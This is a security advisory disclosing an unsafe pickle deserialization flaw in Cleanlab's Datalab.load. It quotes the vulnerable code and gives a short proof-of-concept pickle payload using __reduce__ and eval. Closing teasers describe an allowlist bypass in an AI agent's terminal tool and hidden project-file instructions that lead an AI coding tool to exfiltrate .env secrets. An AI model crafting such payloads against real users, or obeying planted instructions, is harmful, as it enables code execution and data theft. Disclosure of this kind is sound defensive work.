Unsafe deserialization in Datalab leads to arbitrary code execution
September 12, 2024

Products Impacted
This vulnerability exists in versions v2.4.0 or newer of Cleanlab.
CVSS Score: 7.8
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data
Details
To exploit this vulnerability, an attacker would create a directory and place a malicious file called datalabs.pkl in that directory before sending the directory to a victim user. When the victim user loads the directory with Datalabs.load, the vulnerable code is called. The vulnerability exists in the deserialize function of the _Serializer class in the cleanlab/datalab/internal/serialize.py file (shown below).
@classmethod
def deserialize(cls, path: str, data: Optional[Dataset] = None) -> Datalab:
"""Deserializes the datalab object from disk."""
if not os.path.exists(path):
raise ValueError(f"No folder found at specified path: {path}")
with open(os.path.join(path, OBJECT_FILENAME), "rb") as f:
datalab: Datalab = pickle.load(f)
cls._validate_version(datalab)
# Load the issues from disk.
issues_path = os.path.join(path, ISSUES_FILENAME)
if not hasattr(datalab.data_issues, "issues") and os.path.exists(issues_path):
datalab.data_issues.issues = pd.read_csv(issues_path)
issue_summary_path = os.path.join(path, ISSUE_SUMMARY_FILENAME)
if not hasattr(datalab.data_issues, "issue_summary") and os.path.exists(issue_summary_path):
datalab.data_issues.issue_summary = pd.read_csv(issue_summary_path)
if data is not None:
if hash(data) != hash(datalab._data):
raise ValueError(
"Data has been modified since Lab was saved. "
"Cannot load Lab with modified data."
)
if len(data) != len(datalab.labels):
raise ValueError(
f"Length of data ({len(data)}) does not match length of labels ({len(datalab.labels)})"
)
datalab._data = Data(data, datalab.task, datalab.label_name)
datalab.data = datalab._data._data
return datalabThe above code is called by the Datalab.load function shown below.
@staticmethod
def load(path: str, data: Optional[Dataset] = None) -> "Datalab":
"""Loads Datalab object from a previously saved folder.
Parameters
----------
`path` :
Path to the folder previously specified in ``Datalab.save()``.
`data` :
The dataset used to originally construct the Datalab.
Remember the dataset is not saved as part of the Datalab,
you must save/load the data separately.
Returns
-------
`datalab` :
A Datalab object that is identical to the one originally saved.
"""
datalab = _Serializer.deserialize(path=path, data=data)
load_message = f"Datalab loaded from folder: {path}"
print(load_message)
return datalabWhen the user loads the directory with the maliciously crafted pickle file the code shown above will instantiate the _Serializer class and call the deserialize function which then searches for the datalab.pkl file before running pickle.load on the file. An example attack can be seen below, where first we create our exploit directory with the malicious pickle file.
import pickle
class Exploit:
def __reduce__(self):
return (eval, ("print('pwned')",))
open("./exploit/datalab.pkl", "wb").write(pickle.dumps(Exploit()))Once the file has been created, the vulnerability can be exploited by having the user load the malicious directory:
from cleanlab import Datalab
Datalab.load("./exploit")Once the user runs this, the arbitrary code will be executed on the system.
Timeline
July, 11 2024 — Vendor disclosure via process outlined in security page
September 6, 2024 — Followed up with vendor letting them know we plan to publish on September 12, 2024
September 12, 2024 — Public disclosure
Project URL
https://github.com/cleanlab/cleanlab
Researcher: Kasimir Schulz, Principal Security Researcher, HiddenLayer
Related SAI Security Advisory
November 26, 2025
Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode
When in autorun mode with the secure ‘Follow Allowlist’ setting, Cursor checks commands sent to run in the terminal by the agent to see if a command has been specifically allowed. The function that checks the command has a bypass to its logic, allowing an attacker to craft a command that will execute non-whitelisted commands.
October 17, 2025
Data Exfiltration from Tool-Assisted Setup
Windsurf’s automated tools can execute instructions contained within project files without asking for user permission. This means an attacker can hide instructions within a project file to read and extract sensitive data from project files (such as a .env file) and insert it into web requests for the purposes of exfiltration.